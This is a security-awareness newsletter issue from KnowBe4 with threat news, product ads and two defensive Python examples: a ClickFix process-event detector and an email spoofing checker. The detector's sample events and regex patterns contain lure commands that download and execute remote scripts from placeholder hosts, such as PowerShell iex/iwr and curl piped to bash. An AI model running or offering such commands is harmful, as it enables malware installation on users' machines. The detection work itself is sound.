CyberheistNews Vol 15 #27 Is Your Human Risk Management Program Really Making a Difference? Measure It Now

KnowBe4 Team | Jul 8, 2025

CyberheistNews Vol 15 #27  |   July 8th, 2025

Is Your Human Risk Management Program Really Making a Difference? Measure It Now.

Your employees are simultaneously your greatest vulnerability and strongest line of defense. But here's the question: What metrics demonstrate your security awareness efforts are actually building a culture that protects your organization?

The Security Awareness Blind Spot

Many security leaders face a challenging reality:

  • You invest in training without clear evidence of effectiveness
  • You struggle to demonstrate the value of your program to leadership
  • You're uncertain which areas need your limited resources most
  • You suspect gaps in your security culture but can't pinpoint them
  • You know security frameworks exist, but they're too complex or technical

The result? Uncertainty that creates real dangers for your org while bad actors exploit your blind spots daily.

Introducing the free KnowBe4 Program Maturity Assessment

To address these challenges, we've developed the Program Maturity Assessment (PMA) — a free strategic tool that measures your effectiveness at managing human risk and building a strong security culture.

This straightforward five-minute assessment evaluates your organization across 40 Culture Maturity Indicators spanning ten critical dimensions:

  1. Leadership & Strategy: Executive communication and cybersecurity prioritization
  2. Employee-focused Security Tools: MFA, password managers and reporting tools
  3. Employee Mindset: Ownership of security and learning from mistakes
  4. Continuous Improvement: Knowledge sharing and program evolution
  5. Risk Awareness: Understanding risks and security impact
  6. Awareness & Behaviors: Relevant training and adoption of secure practices
  7. Policies & Procedures: Clear policies and efficient incident reporting
  8. Measurement & Metrics: Tracking effectiveness and security KPIs
  9. Employee Engagement: Participation in initiatives and recognition
  10. Integration with Business: Security embedded in daily processes

What You'll Get:

Based on your responses, you'll receive:

  • Your Overall Maturity Classification on our five-level scale, from Basic Compliance (Level 1) to Sustainable Security Culture (Level 5)
  • Detailed scoring for each dimension with specific strengths and improvement areas
  • Visual ranking of your relative performance across all dimensions
  • Prioritized recommendations for advancing to the next maturity level
  • Practical actions you can implement immediately

Beyond Checkbox Compliance: Build a Real, Effective Security Culture

Unlike technical assessments or complex frameworks that speak in jargon, the PMA specifically addresses the human element of your security in plain English. It cuts through the complexity and gives you a clear path to build a security culture that actually works.

Whether you're just starting your security culture journey or looking to take an established program to the next level, the PMA gives you the structure and guidance needed to systematically strengthen your human defense layer.

Take the First Step Today

Transform your security awareness from checkbox compliance into a measurable culture that actually protects your organization against today's evolving human-targeted threats.

Complete the assessment and you'll immediately receive a comprehensive, actionable report outlining where you are and what key steps you should take to advance to the next level.

If this aligns with your organization's goals, you can schedule a call with our team to walk through how KnowBe4's HRM+ Platform can help boost your maturity and create a sustainable path forward.

Take the free assessment today:
https://www.knowbe4.com/free-cybersecurity-tools/program-maturity-assessment

[Live Demo] Ridiculously Easy AI-Powered Security Awareness Training and Phishing

Phishing and social engineering remain the #1 cyber threat to your organization, with 68% of data breaches caused by human error. Your security team needs an easy way to deliver personalized training—this is precisely what our AI Defense Agents provide.

Join us for a demo showcasing KnowBe4's leading-edge approach to human risk management with agentic AI that delivers personalized, relevant and adaptive security awareness training with minimal admin effort.

See how easy it is to train and phish your users with KnowBe4's HRM+ platform:

  • SmartRisk Agent™ - Generate actionable data and metrics to help you lower your organization's human risk score
  • Template Generator Agent - Create convincing phishing simulations, including Callback Phishing, that mimic real threats. The Recommended Landing Pages Agent then suggests appropriate landing pages based on AI-generated templates
  • Automated Training Agent - Automatically identify high-risk users and assign personalized training
  • Knowledge Refresher Agent and Policy Quizzes Agent - Reinforce your security program and organizational policies.
  • Enhanced Executive Reports - Track user activities, visualize trends, download widgets, and improve searching/sorting to provide deeper insights and streamline collaboration

See how these powerful AI-driven features work together to dramatically reduce your organization's risk while saving your team valuable time.

Date/Time: TOMORROW, Wednesday, July 9, @ 2:00 PM (ET)

Save My Spot:
https://info.knowbe4.com/kmsat-demo-1?partnerref=CHN3

What Makes Southeast Asia the "Ground Zero of Cybercrime"?

By Bex Bailey

Our 2025 Phishing By Industry Benchmarking Report examines why organizations across Asia face some of the highest levels of cybersecurity risk worldwide.

In fact, Forrester reveals that organizations in Asia Pacific (APAC) experience an average of 3.5 breaches within a 12-month period versus 2.8 globally. Organizations in the region also experience a cumulative cost of $2.8 million against the global mean of $2.7 million.

There are numerous factors that contribute to this elevated risk — from rapid, yet incredibly uneven, digital transformation, to an over-reliance on third-party suppliers (who are also undergoing their own digital transformations).

Other regions face similar challenges to these: organizations in Africa and South America, for example, also operate within complex maps of digitalization.

However, one factor we highlighted in the report is Southeast Asia's incredibly unique status as "Ground Zero" for cybercrime.

In October 2024, the United Nations Office on Drugs and Crime (UNODC) published a report stating that transnational organized crime in the region is evolving faster than ever before, with cyber-enabled fraud highlighted as one of two areas experiencing intense growth.

In fact, the UNODC estimates that victims in East and Southeast Asia have experienced financial losses between US$18 billion and US$37 billion related to cyber-enabled fraud.

Notably, the UNODC also states that a "predominant proportion" of these losses were attributed to scams run by organized crime groups also located in Southeast Asia.

Several countries in Southeast Asia, particularly those in the Mekong region, have become a "testing ground" for transnational criminal networks, with Asian crime syndicates diversifying their "business lines" to include malware, generative AI and deepfakes.

In a second report, published in April 2025, the UNODC describes how cyber-enabled fraud and scam centers have reached "industrial scale." Underpinning these activities are sophisticated and interconnected networks of money launderers, human traffickers, data brokers and other specialist service providers.

[CONTINUED]
https://blog.knowbe4.com/what-makes-southeast-asia-the-ground-zero-of-cybercrime

[NEW WEBINAR] Ransomware Reality Check: Busting Cybersecurity Myths

Join us for an engaging and interactive webinar where we put ransomware myths to the test! This session takes an analytical approach to the most persistent debates surrounding ransomware attacks, and YOU decide whether they hold weight.

KnowBe4 cybersecurity experts Javvad Malik and Erich Kron will go head-to-head on controversial ransomware topics, presenting evidence, real-world case studies and expert opinions. Should you:

  • Ever negotiate with ransomware groups?
  • Prioritize prevention or recovery?
  • Be required to disclose ransom payments?
  • Face legal consequences for making ransomware payments?
  • Hire former black hat actors as consultants?

But here's where it gets interesting: YOU get the deciding vote! After each debate, you will vote on which argument was most compelling and maybe even walk away from it thinking about ransomware in a new light. Plus earn CPE credit for attending!

Date/Time: Wednesday, July 16 @ 2:00 PM (ET)

Can't attend live? No worries — register now and you will receive a link to view the presentation on-demand afterwards.

Save My Spot:
https://info.knowbe4.com/ransomware-webinar-2025?partnerref=CHN

Crooks Are Using Generative AI to Craft Phishing Pages Almost Instantly

Researchers at Okta warn that cybercriminals are abusing a generative AI tool from Vercel to easily create credential-harvesting phishing pages. The tool, dubbed "v0," is designed to allow users to create websites via natural language prompts. Threat actors can use the tool to generate working phishing pages in under a minute.

"Okta Threat Intelligence has observed threat actors abusing v0, a breakthrough Generative Artificial Intelligence (GenAI) tool created by Vercel, to develop phishing sites that impersonate legitimate sign-in webpages," Okta writes.

"This observation signals a new evolution in the weaponization of Generative AI by threat actors who have demonstrated an ability to generate a functional phishing site from simple text prompts. Okta researchers were able to reproduce our observations."

Vercel has since blocked the sites and is working to prevent such misuse, but Okta notes that the activity shows that threat actors are eager to use AI tools to assist in their attacks.

"The observed activity confirms that today's threat actors are actively experimenting with and weaponizing leading GenAI tools to streamline and enhance their phishing capabilities," the researchers write. "The use of a platform like Vercel's v0.dev allows emerging threat actors to rapidly produce high-quality, deceptive phishing pages, increasing the speed and scale of their operations.

"In addition to Vercel's v0.dev platform, various public GitHub repositories offer direct clones of the v0.dev application or do-it-yourself (DIY) guides for building bespoke generative tools. This open-source proliferation effectively democratizes advanced phishing capabilities, providing the tools for adversaries to create their own phishing infrastructure."

New-school security awareness training gives your organization an essential layer of defense against evolving social engineering attacks. KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.

Okta has the story:
https://www.okta.com/newsroom/articles/okta-observes-v0-ai-tool-used-to-build-phishing-sites/

Registration is Open for KB4-CON EMEA | London

Exciting news — registration is now open for KB4-CON EMEA, our premier event for IT and cybersecurity professionals! Join us 23 October, 2025, at 200 Aldersgate in London.

Explore the world of human risk management, AI and adaptive defense strategies at this annual conference where industry leaders gather to shape the future of security.

At KB4-CON, you'll:

  • EXCEL: Dive deep into KnowBe4's product roadmap and latest updates
  • GROW: Expand your security expertise, build valuable connections
  • GET INSPIRED: Gain insights from top cybersecurity leaders and innovators

This is your opportunity to transform your approach to managing human risk and strengthen your security culture.

Save your spot today and secure early bird pricing of £69! Full price starting 1 August, 2025, is £99. Plus, take advantage of our buy 2 tickets, get 1 free offer and bring your colleagues to maximize your team's experience*.

Don't miss out on the cybersecurity event of the year!

Save My Spot!
https://knowbe4.cventevents.com/RMXXd0?RefId=CHN+Email

Warning: Impersonation Attacks Are Surging

Impersonation scams have risen by 148% over the past year, according to a new report from the Identity Theft Resource Center (ITRC). The majority of these scams posed as businesses or financial entities and attempted to trick victims into handing over credentials or other sensitive information.

"Scammers typically impersonated a business (51% of impersonation scams) or a financial institution (21%), with increased reports of impersonation in both categories," the report says. "While the next highest category of impersonation was a federal/state agency, there was a 32 percent (32%) decrease in reports of impersonation of a government agency compared to the same timeframe in the previous year."

The ITRC warns that cybercriminals are using AI tools to improve upon and scale their social engineering attacks. "Tactics used to lure victims into a scam include using AI to spoof legitimate websites, posting ads on search engines with fake customer service numbers for well-known businesses or sending legitimate-looking emails that pretend to be from a large company," the researchers write.

"They also send text messages that seem to come from legitimate sources. AI tools allow scammers to operate on a much larger scale and target more victims efficiently." The report adds that these attacks will only improve as AI tools grow more sophisticated.

"As AI-generated content becomes more realistic, it becomes more difficult to identify and block fraudulent attempts," the researchers write. "And the thieves don't just ask for money. They will work to get as many personal identifiers as possible to take over accounts, establish new ones or sell the information to make money."

Infosecurity Magazine has the story:
https://www.infosecurity-magazine.com/news/reported-impersonation-scams-surge/


Let's stay safe out there.

Warm Regards,

Stu Sjouwerman, SACP
Founder and Exec Chair
KnowBe4, Inc.

PS: [INC Mag BUDGET AMMO] - Human Risk Management Can Fix the Most Unpatchable Threat:
https://www.inc.com/stu-sjouwerman/human-risk-management-can-fix-the-most-unpatchable-threat/91208814

Quotes of the Week
"If you light a lamp for someone else it will also brighten your path."
- Buddha (563 - 483 BC)

"No one has ever become poor by giving."
- Anne Frank (1929 - 1945)

Thanks for reading CyberheistNews

You can read CyberheistNews online at our Blog
https://blog.knowbe4.com/cyberheistnews-vol-15-27-is-your-human-risk-management-program-really-making-a-difference-measure-it-now

Security News

ClickFix Social Engineering Attacks Surge by More Than 500%

Researchers at ESET warn that the ClickFix social engineering tactic surged by 517% during the first six months of 2025. ClickFix is a technique that tricks users into copying, pasting and running malicious commands on their computers, usually resulting in malware installation.

"One of the most striking developments this period was the emergence of ClickFix, a new, deceptive attack vector that skyrocketed by over 500% compared to H2 2024 in ESET telemetry," ESET says. "Now the second most common attack vector after phishing, ClickFix manipulates internet users into executing malicious commands under the guise of fixing a fake error. The payloads at the end of ClickFix attacks vary widely – from infostealers to ransomware and even to nation-state malware – making this a versatile and formidable threat across Windows, Linux and macOS."

ClickFix is likely to keep growing in popularity now that the technique is being built into commodity phishing kits. Users on every operating system, not only Windows, should be aware of the tactic.

"While Windows users are the largest group affected, macOS and Linux users have also come into the crosshairs," ESET says. "For macOS, public reports reveal that ClickFix campaigns dropped AMOS stealer. For Linux, APT36 was seen redirecting victims to a counterfeit CAPTCHA page that instructed them to run the malicious code via the Alt+F2 shortcut that, on most Linux distributions, opens a Run Command dialog."

Dušan Lacika, a Senior Detection Engineer at ESET, explained, "What makes this new social engineering technique effective is that it is simple enough for the victim to follow the instructions, believable enough to look like it might fix a made-up problem, and abuses the probability that victims won't pay much attention to the exact commands they have been asked to paste and execute on their device. It is also a good example of how threat actors quickly adopt new techniques, once they prove to yield results."
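Because the victim types or pastes the command themselves, the telltale artifact is an interpreter spawned from a run dialog or launcher with a command line that fetches and executes remote content. The following detector is an added example written for this newsletter, not ESET's or KnowBe4's code. It runs a small set of weighted indicators over constructed process-creation events (Sysmon Event ID 1 / auditd-style fields reduced to parent, image and command line). The parent and interpreter lists, the indicator weights, the alert threshold and every hostname or path in the samples are assumptions made for this example.

```python
"""Heuristic ClickFix detector over process-creation events.

Added example (not ESET's or KnowBe4's code). Events are constructed below;
field names, indicator weights and the alert threshold are assumptions.
"""
import os
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str   # path of the spawning process
    image: str          # path of the launched process
    command_line: str   # full command line as logged


# Processes that a user pasting into Win+R, the GNOME/KDE Alt+F2 launcher or
# a macOS terminal typically appears as the parent of the interpreter.
RUN_DIALOG_PARENTS = {"explorer.exe", "gnome-shell", "krunner", "terminal"}

# Interpreters and LOLBins that ClickFix lures ask victims to run.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "sh", "bash", "zsh", "curl", "osascript"}

# (name, pattern, weight). Weights are an assumption for this example.
INDICATORS = [
    ("encoded_powershell",
     re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"), 2),
    ("hidden_window",
     re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 1),
    ("remote_fetch",
     re.compile(r"(?i)\b(?:iwr|invoke-webrequest|downloadstring|curl|wget)\b.*https?://"), 1),
    ("inline_exec",
     re.compile(r"(?i)\b(?:iex|invoke-expression)\b|\|\s*(?:sh|bash|zsh)\b"), 1),
    ("lolbin_url",
     re.compile(r"(?i)\b(?:mshta|msiexec|regsvr32)(?:\.exe)?\b[^|]*https?://"), 2),
    # Lures often append a comment so the pasted line "explains itself" in the
    # Run box, e.g. "# I am not a robot - reCAPTCHA Verification ID: ...".
    ("decoy_comment",
     re.compile(r"(?i)#\s*(?:i am not a robot|human verification|captcha|verification id)"), 2),
]
ALERT_THRESHOLD = 2


def _basename(path: str) -> str:
    return os.path.basename(path.replace("\\", "/")).lower()


def score_command(command_line: str):
    """Return (score, [indicator names]) for one command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(command_line)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def is_clickfix(event: ProcessEvent) -> bool:
    """True when a run-dialog parent launches an interpreter whose command
    line scores at or above the threshold."""
    if _basename(event.parent_image) not in RUN_DIALOG_PARENTS:
        return False
    if _basename(event.image) not in INTERPRETERS:
        return False
    score, _ = score_command(event.command_line)
    return score >= ALERT_THRESHOLD


def scan(events):
    """Return [(event, score, hits)] for every event that alerts."""
    out = []
    for ev in events:
        if is_clickfix(ev):
            score, hits = score_command(ev.command_line)
            out.append((ev, score, hits))
    return out


# Constructed sample events; hostnames and paths are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    # 1. Windows lure pasted into Win+R: should alert.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -c \"iex (iwr 'http://example.invalid/fix.txt')\" "
                 "# I am not a robot - reCAPTCHA Verification ID: 7421"),
    # 2. Admin running a local script from the Run box: should not alert.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    # 3. Linux variant via the Alt+F2 launcher (the pattern ESET describes): should alert.
    ProcessEvent("/usr/bin/gnome-shell", "/bin/sh",
                 'sh -c "curl -fsSL http://example.invalid/verify.sh | bash"'),
    # 4. mshta pulling a remote HTA from the Run box: should alert.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta http://example.invalid/captcha.hta"),
    # 5. Same curl|bash pipeline spawned by an IDE, not a run dialog: no alert here.
    ProcessEvent(r"C:\Users\dev\AppData\Local\Programs\code.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd /c curl http://example.invalid/setup.sh | bash"),
]

if __name__ == "__main__":
    for ev, score, hits in scan(SAMPLE_EVENTS):
        print(f"[ClickFix? score={score}] {_basename(ev.image)} <- "
              f"{_basename(ev.parent_image)}: {hits}")
```

The parent list is deliberately narrow, so a lure that tells the victim to open PowerShell or a terminal first and then paste will show the terminal as the parent; tune RUN_DIALOG_PARENTS to your fleet and pair the rule with a lower-severity version that drops the parent condition. On Windows, what the user typed into the Run box is also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth pulling during triage when process telemetry is thin.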

New-school security awareness training can help your employees defend themselves against evolving social engineering tactics. KnowBe4 empowers your workforce to make smarter security decisions every day.

ESET has the story:
https://www.welivesecurity.com/en/eset-research/eset-threat-report-h1-2025/

Phishing Campaign Targets Investment Firms and Advisors

Phishing attacks are impersonating the U.S. Securities and Exchange Commission (SEC) to target SEC-registered financial services firms and advisors, according to an alert from ACA Group. The emails purport to come from the SEC's Chief Information Officer, and ask users to send a reply.

If a user responds, the scammers will target them with further attacks. "All messages claim to be from David Bottom, the Chief Information Officer at the SEC, though some messages truncate his last name," ACA Group says. "The messages ask the recipient to reply and confirm their email address to enable future secure communications.

"This is a common form of 'pretexting' that is used in phishing scams to verify active contacts and build trust in future interactions. Since this message was benign, the recipient is more likely to interact with the next message, which will likely redirect to a harmful site, trick them into downloading malware, or result in some other harm."

ACA Group offers the following advice to help users avoid falling for these attacks:

  • "Not click any links in the email or open any attachments. Immediately escalate the issue to the firm's IT team.
  • Not respond to or reply to the email.
  • Confirm the validity of the email by contacting a trusted SEC representative using verified contact information. Do not use the details provided in the suspicious email—instead refer to contact information listed on the SEC's website or from another reliable source your firm already uses.
  • Reach out to trusted cyber advisors to alert them of the issue and seek further guidance.
  • Never trust the 'From' field in an email. Always check the email address itself and don't rely on the sender's name alone.
  • Do not download attachments from an unsolicited source.
  • Be cautious of alarmist email subject lines (e.g., 'urgent', 'transfer', 'request', etc.).
  • Create bookmarks for frequently visited websites to avoid visiting fake websites.
  • Contact the IT department when in doubt about unknown and suspicious emails or links.
  • Validate email requests with callbacks to a contact you have on file or visit a legitimate website to find a callback number."
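Two of the checks above ("never trust the 'From' field" and "do not reply") can be automated at the mail gateway or in a triage script. The following is an added example written for this newsletter, not ACA Group's or KnowBe4's code: it parses a raw message with Python's standard email library and flags a display name that claims the SEC while the address domain is not sec.gov (the SEC's real domain), a Reply-To that diverts replies elsewhere, failed SPF/DKIM/DMARC verdicts stamped in Authentication-Results, and the "reply to confirm" pretext itself. The three messages are constructed; every domain other than sec.gov is a placeholder, and the brand-to-domain mapping is an assumption your own brand list would supply.

```python
"""Sender checks for a reply-to-verify pretext like the SEC impersonation.

Added example, not ACA Group's or KnowBe4's code. Messages are constructed;
every domain except sec.gov is a placeholder and CLAIMED_BRANDS is an assumption.
"""
import re
from email import message_from_string
from email.utils import parseaddr

# Brand words seen in display names, mapped to the domain such mail should
# come from. Assumption for this example; a gateway would carry a real list.
CLAIMED_BRANDS = {"sec": "sec.gov", "securities and exchange commission": "sec.gov"}


def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def _auth_results(msg):
    """Pull spf=/dkim=/dmarc= verdicts out of Authentication-Results (RFC 8601)."""
    verdicts = {}
    for header in msg.get_all("Authentication-Results", []):
        for method, result in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", header, re.I):
            verdicts[method.lower()] = result.lower()
    return verdicts


def check_sender(raw_message: str):
    """Return a list of findings; an empty list means nothing suspicious here."""
    msg = message_from_string(raw_message)
    findings = []

    display, addr = parseaddr(msg.get("From", ""))
    from_domain = _domain(addr)

    # 1. Display name claims an organisation whose domain the address does not match.
    for brand, expected in CLAIMED_BRANDS.items():
        if re.search(rf"\b{re.escape(brand)}\b", display, re.I) and from_domain != expected:
            findings.append(f"display name references '{brand}' but address domain is "
                            f"{from_domain or '(none)'}, expected {expected}")

    # 2. Reply-To on a different domain: replies go to the attacker, not the sender.
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and _domain(reply_addr) != from_domain:
        findings.append(f"Reply-To domain {_domain(reply_addr)} differs from From domain {from_domain}")

    # 3. Authentication verdicts, when the receiving gateway stamped them.
    for method, result in _auth_results(msg).items():
        if result in ("fail", "softfail", "permerror"):
            findings.append(f"{method} {result}")

    # 4. A bare "reply to confirm" request is the contact-validation pretext itself.
    body = msg.get_payload(decode=True) or b""
    if re.search(r"reply\b.{0,40}\bconfirm", body.decode("utf-8", "replace"), re.I | re.S):
        findings.append("body asks the recipient to reply and confirm (contact-validation pretext)")

    return findings


# Constructed samples. Lookalike sender on a placeholder domain with a diverted Reply-To.
LOOKALIKE = """From: "David Bottom, CIO - SEC" <d.bottom@example.net>
Reply-To: sec-cio-desk@example.org
To: compliance@example.com
Subject: Urgent: confirm your email address
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.net; dkim=pass header.d=example.net; dmarc=none

Please reply to this message to confirm your email address so we can enable secure communications.
"""

# Direct spoof of the real domain; the gateway's SPF/DMARC verdicts give it away.
SPOOFED = """From: David Bottom <david.bottom@sec.gov>
To: compliance@example.com
Subject: Re: secure channel
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=example.net; dkim=none; dmarc=fail header.from=sec.gov

Kindly reply so we can confirm this address for future correspondence.
"""

BENIGN = """From: Jane Doe <jane.doe@example.com>
To: compliance@example.com
Subject: Lunch on Thursday?
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com

Are you free Thursday at noon?
"""

if __name__ == "__main__":
    for label, raw in (("lookalike", LOOKALIKE), ("spoofed", SPOOFED), ("benign", BENIGN)):
        print(label, check_sender(raw))
```

None of these checks replaces the out-of-band callback ACA Group recommends: a message that passes all of them can still be a compromised but legitimate mailbox, which is exactly the account-takeover outcome the first "benign" reply is meant to set up.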

KnowBe4 empowers your workforce to make smarter security decisions every day.

ACA Group has the story:
https://www.acaglobal.com/industry-insights/active-phishing-campaign-impersonating-the-sec-firms-should-be-on-alert/

The 10 Interesting News Items This Week
  1. Europol helps disrupt $540 million crypto investment fraud ring:
    https://www.bleepingcomputer.com/news/security/europol-helps-disrupt-540-million-crypto-investment-fraud-ring/

  2. WSJ: "U.S. Indicts North Koreans in Fake Tech Worker Scam":
    https://www.wsj.com/business/he-thought-an-employee-stole-crypto-the-fbi-says-it-was-a-north-korean-scammer-8aa533a8?

  3. US Justice Department shutters 29(!) suspected North Korean laptop farms:
    https://www.justice.gov/opa/pr/justice-department-announces-coordinated-nationwide-actions-combat-north-korean-remote

  4. Qantas discloses cyberattack amid Scattered Spider aviation breaches:
    https://www.bleepingcomputer.com/news/security/qantas-discloses-cyberattack-amid-scattered-spider-aviation-breaches/

  5. Ransomware gang attacks German charity that feeds starving children:
    https://therecord.media/welthungerhilfe-german-hunger-relief-charity-ransomware-attack

  6. Russian Aeza Group sanctioned for hosting ransomware, infostealer servers:
    https://www.bleepingcomputer.com/news/security/aeza-group-sanctioned-for-hosting-ransomware-infostealer-servers/

  7. LLMs are falling for phishing scams and recommending malicious sites:
    https://www.netcraft.com/blog/large-language-models-are-falling-for-phishing-scams

  8. Scammers are using AI to impersonate travel agents:
    https://www.mcafee.com/blogs/tips-tricks/how-criminals-are-using-ai-to-clone-travel-agents-and-steal-your-money/

  9. Phishing campaign uses thousands of websites to spoof retail brands:
    https://www.silentpush.com/blog/fake-marketplace/

  10. Attackers are increasingly using PDF files in phishing attacks:
    https://blog.talosintelligence.com/pdfs-portable-documents-or-perfect-deliveries-for-phish/

Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff

Topics: Cybercrime, KnowBe4
